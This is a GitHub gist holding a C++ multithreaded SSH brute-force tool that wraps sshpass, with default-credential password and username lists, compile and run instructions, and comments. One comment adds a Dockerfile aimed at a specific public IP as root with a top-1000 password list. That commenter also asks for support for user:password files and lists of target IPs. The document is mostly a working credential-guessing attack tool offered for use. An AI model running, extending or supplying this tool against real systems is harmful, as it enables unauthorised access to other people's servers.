Last active
March 3, 2021 13:28
-
-
Save kashimAstro/dca084ed52a34bde98a166e64edf387a to your computer and use it in GitHub Desktop.
c++ brute force ssh multithreading with sshpass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Dario Longobardi | |
| Test ssh brute force multithreading | |
| */ | |
| #include <iostream> | |
| #include <unistd.h> | |
| #include <thread> | |
| #include <vector> | |
| #include <fstream> | |
| #include <ctime> | |
| #include <signal.h> | |
| #include <semaphore.h> | |
| using namespace std; | |
| vector<thread*> th; | |
| static sem_t semaphore; | |
| bool enabled_sem; | |
| int MAX_THREAD; | |
| string port; | |
| string username; | |
| string host; | |
| string passwd; | |
| string command; | |
| vector<string> lpasswd,lname; | |
| clock_t startTime; | |
| void ssh(string _user, string _host, string _passwd, string _port, string _command) | |
| { | |
| string _ssh_ = "sshpass -p '"+_passwd+"' ssh "+_user+"@"+_host+" -p "+_port; | |
| FILE* remf = popen(_ssh_.c_str(), "w"); | |
| sleep(1); | |
| if (!remf) { | |
| cerr << "Error: popen ssh!" << endl; | |
| exit(0); | |
| } | |
| string _c = _command+"\n"; | |
| fprintf(remf, (char *)_c.c_str() ); | |
| fclose(remf); | |
| } | |
| void quit(int q) | |
| { | |
| cout << "End" << endl; | |
| exit(0); | |
| } | |
| void event(int index) | |
| { | |
| while(1) | |
| { | |
| static unsigned int counter_pwd = 0; | |
| static unsigned int counter_name = 0; | |
| if(enabled_sem) sem_wait(&semaphore); | |
| cout << "thread-id:"<<index<<" counter-user:"<<counter_name<<" counter-pwd:"<<counter_pwd | |
| <<" cmd:[" <<"sshpass -p '"+lpasswd[counter_pwd]+"' ssh "+lname[counter_name]+"@"+host+" -p "+port<<" "<<command<<"]"<<endl; | |
| ssh(lname[counter_name], host, lpasswd[counter_pwd], port, command); | |
| counter_pwd++; | |
| if(counter_pwd>=lpasswd.size()) | |
| { | |
| counter_pwd=0; | |
| counter_name++; | |
| } | |
| if(counter_name>=lname.size()) { | |
| counter_pwd=0; | |
| counter_name=0; | |
| clock_t endTime = clock(); | |
| double secs = double(endTime - startTime) / CLOCKS_PER_SEC; | |
| cout <<"Time: "<< secs << endl; | |
| exit(0); | |
| } | |
| if(enabled_sem) sem_post(&semaphore); | |
| usleep(10000); | |
| } | |
| } | |
| int main(int argc, char ** argv) | |
| { | |
| if(argc<7) | |
| { | |
| cerr << "Parameters: num-thread username-list.txt host passwd-list.txt port command" << endl; | |
| exit(0); | |
| } | |
| signal(SIGINT,quit); | |
| startTime = clock(); | |
| enabled_sem= true; | |
| MAX_THREAD = atoi(argv[1]); | |
| username = argv[2]; | |
| host = argv[3]; | |
| passwd = argv[4]; | |
| port = argv[5]; | |
| command = argv[6]; | |
| string line,line1; | |
| ifstream xfile(passwd); | |
| ifstream ffile(username); | |
| if (xfile.is_open() ) | |
| { | |
| while ( getline (xfile,line) ) | |
| lpasswd.push_back( line ); | |
| xfile.close(); | |
| } | |
| if (ffile.is_open() ) | |
| { | |
| while ( getline (ffile,line1) ) | |
| lname.push_back( line1 ); | |
| ffile.close(); | |
| } | |
| if (enabled_sem) { | |
| if (sem_init(&semaphore, 0, 1) == -1) | |
| cerr << "Error: semaphore" << endl; | |
| } | |
| for(int i = 0; i < MAX_THREAD; i++) | |
| { | |
| thread* t = new thread(event, i); | |
| th.push_back(t); | |
| } | |
| for(unsigned int i = 0; i < th.size(); i++) | |
| th[i]->join(); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 123456 | |
| password | |
| 12345678 | |
| username | |
| 123456789 | |
| 12345 | |
| 1234 | |
| admin | |
| user | |
| administrator |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root | |
| user | |
| admin | |
| administrator | |
| username | |
| pi | |
| pippo | |
| pluto | |
| paperino | |
| minny |
i wanted do it in docker, but couldnt
FROM gcc:10
WORKDIR /myapp
RUN apt update
RUN apt install sshpass
RUN wget https://gist.githubusercontent.com/kashimAstro/dca084ed52a34bde98a166e64edf387a/raw/c7c0164136ae70811d0efe2590337ac8649a97ea/force-sshpass.cpp
RUN g++ -Wall -o ssh-force force-sshpass.cpp -lpthread --std=c++11 -lrt
RUN wget https://raw.githubusercontent.com/dustyfresh/dictionaries/master/top_1000.txt
RUN echo root > users.txt
CMD ["./ssh-force 40 users.txt 185.209.115.83 top_1000.txt 22 ls"]
nano Dockerfile
docker build -t my-gcc-app-ssh-bru .
docker run -it --rm my-gcc-app-ssh-bru
but it says
thread-id:0 counter-user:0 counter-pwd:0 cmd:[sshpass -p '123456' ssh root@123.45.67.89 -p 22 ls]
Pseudo-terminal will not be allocated because stdin is not a terminal.
Can you do it to take users and pass from same file ? (example, first string user:password) and grab ip from file also ? like 1 string 1 ip ?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
compile:
g++ -Wall -o ssh-force force-sshpass.cpp -lpthread --std=c++11 -lrt
example run:
./ssh-force 40 user_10168.txt 192.168.7.17 pwd_1000000.txt 22 ls
parameters:
num-thread username-list.txt host passwd-list.txt port command